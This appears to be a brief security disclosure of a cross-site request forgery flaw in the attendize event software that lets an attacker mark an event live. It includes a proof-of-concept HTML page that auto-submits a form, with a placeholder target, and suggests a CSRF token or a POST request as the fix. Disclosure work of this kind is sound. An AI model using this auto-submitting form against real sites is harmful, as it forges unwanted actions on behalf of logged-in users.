Cross-Site Request Forgery (CSRF) in attendize/attendize
Sep 25th 2021
Attacker is able to make an event live.
Proof of Concept
When you logged in open this POC.html in a browser.
<html> <body> <script>history.pushState('', '', '/')</script> <form action="Demo URL"> <input type="submit" value="Submit request" /> </form> <script> document.forms.submit(); </script> </body> </html>
This vulnerability is capable of forging user to unintentional mark an event live.
Tested on Safari.
You should set a CSRF token on such GET requests or you can use POST instead of GET then because of cookie SameSite is Lax, request from other origins could not carry cookie.